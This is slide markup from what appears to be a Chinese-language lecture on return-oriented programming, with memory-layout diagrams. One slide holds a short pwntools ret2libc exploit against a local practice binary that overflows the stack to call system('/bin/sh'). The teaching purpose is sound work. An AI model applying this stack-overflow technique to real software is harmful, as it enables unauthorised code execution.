            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345198" y="1851470"/>
            <a:ext cx="336604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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2libc1")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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binsh_addr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= 0x08048720</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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system_plt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= 0x08048460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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payload = flat([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'A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'*112, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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system_plt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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b'B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'*4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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binsh_addr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])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendline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(payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165553583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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
